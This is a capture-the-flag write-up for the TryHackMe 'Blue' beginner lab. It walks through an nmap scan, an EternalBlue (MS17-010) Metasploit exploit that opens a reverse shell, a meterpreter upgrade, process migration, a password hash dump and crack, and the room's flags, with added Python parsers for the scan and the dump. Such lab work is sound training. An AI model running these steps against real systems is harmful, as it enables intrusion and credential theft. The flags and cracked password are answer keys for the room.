THM: Blue

Solution to the Blue room

Recon

Scan and learn what exploit this machine is vulnerable to. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up. This room is not meant to be a boot2root CTF, rather, this is an educational series for complete beginners. Professionals will likely get very little out of this room beyond basic practice as the process here is meant to be beginner-focused.

The virtual machine used in this room (Blue) can be downloaded for offline usage from [https://darkstar7471.com/resources.html](https://darkstar7471.com/resources.html).

_Enjoy the room! For future rooms and write-ups, follow @darkstar7471 on Twitter._

Answer the questions

Scan the machine. (If you are unsure how to tackle this, I recommend checking out the [Nmap](https://tryhackme.com/room/furthernmap) room)

```bash
nmap -sV -sC --script vuln -oN blue.nmap 10.10.143.88

# Nmap 7.80 scan initiated Tue Oct 21 13:16:46 2025 as: nmap -sV -sC --script vuln -oN blue.nmap 10.10.143.88
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.143.88
Host is up (0.00062s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3389/tcp  open  tcpwrapped
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rdp-vuln-ms12-020: 
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|           
|     Disclosure date: 2012-03-13
|     References:
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|   
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|           
|     Disclosure date: 2012-03-13
|     References:
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 
49152/tcp open  msrpc        Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open  msrpc        Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open  msrpc        Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49158/tcp open  msrpc        Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49160/tcp open  msrpc        Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 02:D7:4D:B1:AF:7D (Unknown)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct 21 13:19:04 2025 -- 1 IP address (1 host up) scanned in 138.25 seconds
```

How many ports are open with a port number under 1000?

Answer: 3

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

Answer: ms17-010
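Both Recon answers can be read straight out of the scan file rather than by eye. The following is an added example, not part of the original write-up: a small parser for nmap's normal (-oN) output that lists the open ports under 1000 and pulls the Microsoft bulletin id out of every NSE script block that reported State: VULNERABLE. NMAP_OUTPUT is a constructed, trimmed copy of the scan above.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: a trimmed copy of the nmap scan shown above (port table plus the
# NSE blocks that reported State: VULNERABLE; clamav-exec noise and some rows dropped).
NMAP_OUTPUT = """\
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
| rdp-vuln-ms12-020:
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
49152/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
SCRIPT_RE = re.compile(r"^\| ([\w-]+):\s*$")          # first line of a multi-line NSE block
STATE_RE = re.compile(r"^\|\s+State:\s+(\w+)")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
MS_RE = re.compile(r"ms\d{2}-\d{3}", re.IGNORECASE)    # bulletin id embedded in the script name

@dataclass
class Finding:
    script: str               # NSE script that reported it, e.g. smb-vuln-ms17-010
    port: Optional[int]       # port the script ran against; None for host scripts
    bulletin: Optional[str]   # Microsoft bulletin id taken from the script name
    cves: List[str] = field(default_factory=list)

@dataclass
class ScanResult:
    open_ports: List[Tuple[int, str]]   # (port, service) for every "open" row
    findings: List[Finding]

def parse_nmap(text: str) -> ScanResult:
    """Walk normal (-oN) output line by line, tracking the current port and NSE script."""
    open_ports, findings = [], []
    port, script, vulnerable = None, None, False
    for line in text.splitlines():
        if line.startswith("Host script results"):
            port = None                        # host scripts are not tied to a port
        m = PORT_RE.match(line)
        if m:
            port = int(m.group(1))
            if m.group(3) == "open":
                open_ports.append((port, m.group(4)))
            continue
        m = SCRIPT_RE.match(line)
        if m:
            script, vulnerable = m.group(1), False
            continue
        m = STATE_RE.match(line)
        if m:
            vulnerable = m.group(1).upper() == "VULNERABLE"
            continue
        if vulnerable and script and "IDs:" in line:
            bm = MS_RE.search(script)
            findings.append(Finding(script, port, bm.group(0).lower() if bm else None,
                                    CVE_RE.findall(line)))
            vulnerable = False                 # one finding per State/IDs pair
    return ScanResult(open_ports, findings)

def open_ports_below(result: ScanResult, limit: int = 1000) -> List[int]:
    return [p for p, _ in result.open_ports if p < limit]

def bulletins(result: ScanResult) -> List[str]:
    return sorted({f.bulletin for f in result.findings if f.bulletin})
```

Run against the full blue.nmap file, `open_ports_below` returns 135, 139 and 445 and `bulletins` returns ms12-020 and ms17-010, which is the triage a scanner feed would hand to patch management.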


Gain Access

Exploit the machine and gain a foothold.

Answer the questions

Start [Metasploit](https://tryhackme.com/module/metasploit)

```bash
msfconsole
```

Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)

```bash
msf6 > search type:exploit windows 7 name:ms17-010

Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
   10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                         .                .        .      .
   12    \_ target: PowerShell                        .                .        .      .
   13    \_ target: Native upload                     .                .        .      .
   14    \_ target: MOF upload                        .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   16    \_ AKA: ETERNALROMANCE                       .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   18    \_ AKA: ETERNALBLUE                          .                .        .      .


Interact with a module by name or index. For example info 18, use 18 or use exploit/windows/smb/ms17_010_psexec

msf6 >
```

Answer: exploit/windows/smb/ms17_010_eternalblue

Show options and set the one required value. What is the name of this value? (All caps for submission)

```bash
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.215.60     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.143.88
RHOSTS => 10.10.143.88
msf6 exploit(windows/smb/ms17_010_eternalblue) >
```

Answer: RHOSTS

Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:

```bash
set payload windows/x64/shell/reverse_tcp
```

With that done, run the exploit!

```bash
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >
```

Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

```bash
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.215.60:4444 
[*] 10.10.143.88:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.143.88:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.143.88:445      - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.143.88:445 - The target is vulnerable.
[*] 10.10.143.88:445 - Connecting to target for exploitation.
[+] 10.10.143.88:445 - Connection established for exploitation.
[+] 10.10.143.88:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.143.88:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.143.88:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.143.88:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.143.88:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.143.88:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.143.88:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.143.88:445 - Sending all but last fragment of exploit packet
[*] 10.10.143.88:445 - Starting non-paged pool grooming
[+] 10.10.143.88:445 - Sending SMBv2 buffers
[+] 10.10.143.88:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.143.88:445 - Sending final SMBv2 buffers.
[*] 10.10.143.88:445 - Sending last fragment of exploit packet!
[*] 10.10.143.88:445 - Receiving response from exploit packet
[+] 10.10.143.88:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.143.88:445 - Sending egg to corrupted connection.
[*] 10.10.143.88:445 - Triggering free of corrupted buffer.
[-] 10.10.143.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.143.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.143.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.143.88:445 - Connecting to target for exploitation.
[+] 10.10.143.88:445 - Connection established for exploitation.
[+] 10.10.143.88:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.143.88:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.143.88:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.143.88:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.143.88:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.143.88:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.143.88:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.143.88:445 - Sending all but last fragment of exploit packet
[*] 10.10.143.88:445 - Starting non-paged pool grooming
[+] 10.10.143.88:445 - Sending SMBv2 buffers
[+] 10.10.143.88:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.143.88:445 - Sending final SMBv2 buffers.
[*] 10.10.143.88:445 - Sending last fragment of exploit packet!
[*] 10.10.143.88:445 - Receiving response from exploit packet
[+] 10.10.143.88:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.143.88:445 - Sending egg to corrupted connection.
[*] 10.10.143.88:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.143.88
[*] Command shell session 1 opened (10.10.215.60:4444 -> 10.10.143.88:49191) at 2025-10-21 13:30:35 +0100
[+] 10.10.143.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.143.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.143.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----
          

C:\Windows\system32>
```


Escalate

Escalate privileges, learn how to upgrade shells in metasploit.

Answer the questions

If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

```bash
C:\Windows\system32>background

Background session 1? [y/N]  y
msf6 exploit(windows/smb/ms17_010_eternalblue) > search type:post name:shell_to_meterpreter
[-] No results from search
msf6 exploit(windows/smb/ms17_010_eternalblue) > search type:post shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter  .                normal  No     Shell to Meterpreter Upgrade


Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter

msf6 exploit(windows/smb/ms17_010_eternalblue) >
```

Answer: post/multi/manage/shell_to_meterpreter

Select this (use MODULE_PATH). Show options; what option are we required to change?

```bash
msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > show options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(multi/manage/shell_to_meterpreter) >
```

Answer: SESSION

Set the required option; you may need to list all of the sessions to find your target here.

```bash
msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type               Information                                               Connection
  --  ----  ----               -----------                                               ----------
  1         shell x64/windows  Shell Banner: Microsoft Windows [Version 6.1.7601] -----  10.10.215.60:4444 -> 10.10.143.88:49191 (10.10.143.88)

msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) >
```

Run! If this doesn't work, try completing the exploit from the previous task once more.

```bash
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.215.60:4433 
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (203846 bytes) to 10.10.143.88
[*] Meterpreter session 2 opened (10.10.215.60:4433 -> 10.10.143.88:49192) at 2025-10-21 13:38:53 +0100
[*] Stopping exploit/multi/handler
msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                               Connection
  --  ----  ----                     -----------                                               ----------
  1         shell x64/windows        Shell Banner: Microsoft Windows [Version 6.1.7601] -----  10.10.215.60:4444 -> 10.10.143.88:49191 (10.10.143.88)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC                              10.10.215.60:4433 -> 10.10.143.88:49192 (10.10.143.88)
```

Once the meterpreter shell conversion completes, select that session for use.

```bash
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >
```

Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

```bash
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

```bash
meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 100   696   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 488   696   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 540   820   WmiPrvSE.exe
 548   540   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 600   540   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 608   588   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 648   588   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 696   600   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 704   600   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 712   600   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 820   696   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 888   696   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE
 936   696   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
 1004  648   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\LogonUI.exe
 1044  696   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
 1164  696   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE
 1288  696   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1324  696   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
 1392  696   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 1464  696   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\XenTools\LiteAgent.exe
 1596  696   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
 1860  1288  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
 1944  696   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE
 2008  548   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe
 2040  696   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM
 2268  1584  powershell.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 2348  696   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
 2484  696   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE
 2488  696   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 2532  696   vds.exe               x64   0        NT AUTHORITY\SYSTEM
 2556  548   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe
 2708  696   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM
 2848  2352  powershell.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 2880  548   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe
 3012  1596  powershell.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
 3020  548   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe

meterpreter >
```

Migrate to this process using the 'migrate PROCESS_ID' command, where the process id is the one you just wrote down in the previous step. This may take several attempts; migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

```bash
meterpreter > migrate 1288
[*] Migrating from 2848 to 1288...
[*] Migration completed successfully.
meterpreter >
```


Cracking

Dump the non-default user's password and crack it!

Answer the questions

Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

```bash
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >
```

Answer: Jon

Copy this password hash to a file and research how to crack it. What is the cracked password?

The NT hash was looked up at https://hashes.com/en/decrypt/hash, which returned:

```text
ffb43f0de35be4d9917ac0cc8ad57f8d:alqfna22
```

Answer: alqfna22
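The hashdump lines above are in pwdump format (user:rid:lm_hash:nt_hash:::), and the dump alone already tells a defender a lot before any lookup is attempted. The following is an added example, not part of the original write-up: a parser that picks out the non-default account by RID and flags what the hashes themselves reveal, namely the accounts whose NT hash is the well-known hash of the empty string, any account still storing an LM hash, and any NT hash shared by two accounts. HASHDUMP is a copy of the output shown above; the empty-hash constants are fixed, well-known values.

```python
from dataclasses import dataclass
from typing import Dict, List

# Fixed, well-known values: the NT hash of the empty string, and the LM hash Windows
# stores when LM hashing is disabled (i.e. no LM hash is kept at all).
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# Copy of the hashdump output above (pwdump format: user:rid:lm_hash:nt_hash:::).
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""

@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def builtin(self) -> bool:
        # RIDs below 1000 are reserved for well-known accounts (500 Administrator, 501 Guest);
        # accounts created later on the machine get RIDs from 1000 upwards.
        return self.rid < 1000

    @property
    def blank_password(self) -> bool:
        # Also true for a disabled built-in account that never had a password set,
        # so confirm the account state before reporting it as a live weakness.
        return self.nt == EMPTY_NT

    @property
    def lm_stored(self) -> bool:
        return self.lm != EMPTY_LM

def parse_hashdump(text: str) -> List[Account]:
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4 or len(parts[2]) != 32 or len(parts[3]) != 32:
            raise ValueError(f"not a pwdump line: {line!r}")
        accounts.append(Account(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return accounts

def non_default_users(accounts: List[Account]) -> List[str]:
    return [a.user for a in accounts if not a.builtin]

def audit(accounts: List[Account]) -> Dict[str, list]:
    """Findings worth raising from the dump alone: blank passwords, LM hashes still stored,
    and NT hashes shared by more than one account (the same password reused)."""
    report = {"blank_password": [], "lm_hash_stored": [], "shared_password": []}
    by_nt: Dict[str, List[str]] = {}
    for a in accounts:
        if a.blank_password:
            report["blank_password"].append(a.user)
        else:
            by_nt.setdefault(a.nt, []).append(a.user)
        if a.lm_stored:
            report["lm_hash_stored"].append(a.user)
    report["shared_password"] = [users for users in by_nt.values() if len(users) > 1]
    return report
```

On this dump the only non-default account is Jon, no LM hashes are stored, and Administrator and Guest both carry the empty-string NT hash, which is the expected state for the disabled built-ins on a Windows 7 box but still worth confirming.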


Find flags!

Find the three flags planted on this machine. These are not traditional flags, rather, they're meant to represent key locations within the Windows system.

Answer the questions

Flag1? _This flag can be found at the system root._

```bash
meterpreter > search -fi *Flag1*
Found 2 results...
==================

Path                                                             Size (bytes)  Modified (UTC)
----                                                             ------------  --------------
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag1.lnk  482           2019-03-17 19:26:42 +0000
c:\flag1.txt                                                     24            2019-03-17 19:27:21 +0000

meterpreter > cat flag1.txt
flag{access_the_machine}meterpreter >
```

Answer: flag{access_the_machine}

Flag2? _This flag can be found at the location where passwords are stored within Windows._
*Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare; however, it can happen.

```bash
meterpreter > search -fi *flag2*
Found 2 results...
==================

Path                                                             Size (bytes)  Modified (UTC)
----                                                             ------------  --------------
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag2.lnk  848           2019-03-17 19:30:04 +0000
c:\Windows\System32\config\flag2.txt                             34            2019-03-17 19:32:48 +0000

meterpreter > cat C:/Windows/system32/config/flag2.txt
flag{sam_database_elevated_access}
```

Answer: flag{sam_database_elevated_access}

Flag3? _This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved._

```bash
meterpreter > search -fi *flag3*
Found 2 results...
==================

Path                                                             Size (bytes)  Modified (UTC)
----                                                             ------------  --------------
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag3.lnk  2344          2019-03-17 19:32:52 +0000
c:\Users\Jon\Documents\flag3.txt                                 37            2019-03-17 19:26:36 +0000

meterpreter > cat C:/Users/Jon/Documents/flag3.txt
flag{admin_documents_can_be_valuable}
```

Answer: flag{admin_documents_can_be_valuable}